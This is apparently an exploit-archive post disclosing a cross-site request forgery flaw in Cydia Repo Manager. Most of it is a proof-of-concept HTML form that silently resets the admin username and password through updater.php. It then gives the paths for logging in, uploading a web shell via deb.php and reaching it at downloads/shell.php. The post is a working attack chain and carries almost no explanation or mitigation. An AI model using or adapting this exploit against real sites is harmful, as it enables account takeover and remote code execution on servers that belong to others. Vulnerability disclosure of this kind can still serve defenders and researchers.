Cydia Repo Manager CSRF Vulnerability

Proof of concept:
 
<form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php">
<input type="text" name="user" value="Username"/> <br />
<input type="text" name="pass" value="Password"/><br />
<input type="submit" name="s" value="w00tw00t!" />
</form>
 
 
Login :  http://bastardlabs/[CydiaRepoManager_path]/index.php
 
Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php
 
Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php
 
 
Demo :
http://bastardlabs.info/demo/CydiaRepoManager1.png
http://bastardlabs.info/demo/CydiaRepoManager2.png
http://bastardlabs.info/demo/CydiaRepoManager3.png

#  0day.today [2018-01-01]  #